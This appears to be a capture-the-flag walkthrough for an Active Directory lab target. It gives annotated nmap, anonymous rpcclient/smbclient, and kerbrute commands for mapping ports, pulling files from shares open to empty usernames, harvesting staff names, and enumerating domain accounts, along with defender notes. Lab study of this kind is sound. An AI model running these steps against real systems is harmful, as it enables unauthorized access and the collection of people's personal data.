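# Full TCP port sweep of the lab target; -Pn skips host discovery and -oN
# saves the normal-format output to nmap_ports.txt.
# The trailing backslash is required: without it "-oN nmap_ports.txt" runs as
# a separate command and nothing is saved.
# --min-rate 1000 is aggressive; on a lossy link a fast scan can miss ports,
# so re-check unexpected results at a lower rate.
nmap -p- -Pn "$target" -v --min-rate 1000 --max-rtt-timeout 1000ms --max-retries 5 \
  -oN nmap_ports.txt
# PORT 53 (DNS), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP),
# 464 (kpasswd), 593 (RPC over HTTP)

# Connect to the Windows machine's RPC service without a password (-N).
rpcclient -N "$target"

# List what is shared on this server.
# -N suppresses the password prompt; -U '' sends an empty username.
smbclient -N -L "\\\\$target\\" -U ''
# -L (list mode) only shows which shares are available.
# A UNC path is required: either backslashes (each one escaped for the shell,
# so \\\\host\\ reaches smbclient as \\host\) or the //host/ format.
smbclient -N -L "\\\\$target\\"

# Same thing in the two path formats: escaped backslashes, then forward slashes.
smbclient "\\\\$target\\VulnNet-Business-Sharing"
smbclient -U "" "//$target/VulnNet-Business-Anonymous"
smbclient -U "" "//$target/VulnNet-Enterprise-Anonymous"

# Typed at the smbclient prompt, not in the local shell:
# this downloads all three files to your current local directory on Kali.
mget *
smbclient -U "" "//$target/VulnNet-Business-Anonymous"
mget *
# Defender note: these shares were readable with an empty username, and the
# files in them contain staff names. Anonymous/guest share access should be
# disabled or limited to content that is safe to publish.

# Read Enterprise-Operations.txt and all the other downloaded files, and look
# for the names of people mentioned in them.
cat Enterprise-Operations.txt
# Copy the names into usernames.txt.
nano usernames.txt
# NOTE: this appends to the packaged SecLists wordlist in place (it needs
# write access there and permanently changes the list); a private copy of the
# wordlist would leave the original intact.
cat usernames.txt >> /usr/share/seclists/Usernames/Names/names.txt
# Check which candidate usernames exist in the vulnnet-rst.local domain.
# Defender note: userenum tells valid from unknown names by the KDC's reply to
# an AS-REQ and does not register as a failed logon, so lockout thresholds do
# not catch it. Detection depends on Kerberos authentication service auditing
# on the DC (event 4768) and on spotting many requests for unknown principals
# from one source.
kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt --dc "$target" -d vulnnet-rst.local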
<aside> 💡
If you've ever used an FTP client, the commands at the smbclient prompt will feel familiar:

- ls → list files (same as FTP)
- get → download one file (same as FTP)
- mget → download multiple files (same as FTP)
- put → upload one file (same as FTP)
- mput → upload multiple files (same as FTP)
- cd → change directory (same as FTP)
- exit → quit (same as FTP)
</aside>
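# Check which names in the wordlist are valid accounts in vulnnet-rst.local,
# using the target as the domain controller (--dc).
# "$target" is quoted so an empty or unusual value cannot be word-split into
# extra arguments.
# Defender note: this enumeration does not register as a failed logon, so
# lockout policy does not catch it; Kerberos authentication service auditing
# on the DC (event 4768) is what makes it visible.
kerbrute userenum /usr/share/seclists/Usernames/Names/names.txt --dc "$target" -d vulnnet-rst.local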